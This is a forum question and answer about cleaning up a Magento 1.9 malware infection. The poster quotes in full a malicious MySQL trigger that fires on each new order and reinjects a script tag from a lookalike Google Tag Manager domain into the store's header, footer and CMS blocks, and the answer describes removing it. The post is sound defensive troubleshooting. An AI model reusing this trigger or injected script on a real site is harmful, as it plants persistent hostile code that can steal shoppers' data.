# Magento Malware googletagmanager.eu

Tags: magento-1.9

Been struggling with a malware infection for a few days. 
It seems to append itself to every block in the theme.

Obviously I can remove the entries easily using find and replace in **phpmyadmin** but they reappear every hour or so, which lead me to believe its running in a cron job or similar.

I have tracked down a file using grep in `virtfs/myaccount/var/lib/mysql/myaccount_magento/sales_flat_order`.TRG which contains what looks like the trigger.

`triggers='CREATE DEFINER=`myaccount_magento`@`localhost`TRIGGER after_insert_order AFTER INSERT ON sales_flat_order FOR EACH ROW BEGIN UPDATE core_config_data SET`value`= IF(`value`LIKE \'%<script src="https://googletagmanager.eu/gtm.js"></script>%\',`value`, CONCAT(`value`, \'<script src="https://googletagmanager.eu/gtm.js"></script>\')) WHERE path=\'design/head/includes\' OR path=\'design/footer/absolute_footer\' OR path=\'design/footer/copyright\';UPDATE cms_block SET`content`= IF(`content`LIKE \'%<script src="https://googletagmanager.eu/gtm.js"></script>%\',`content`, CONCAT(`content`, \'\')); END'

This is clearly injecting the script into the blocks.

How do I delete the TRG file and what is it?

Answer (score 0):

I found it - triggers in phpmyadmin. It had inserted itself in there to run and was defined by an email to the localhost.

To get rid of all entries I used search and replace in phpmyadmin to replace with "":

```
<script src="https://googletagmanager.eu/gtm.js"></script>
```

Then found the trigger on the table.

Changed passwords, changed admin directory, checked permissions. hopefully that should solve it.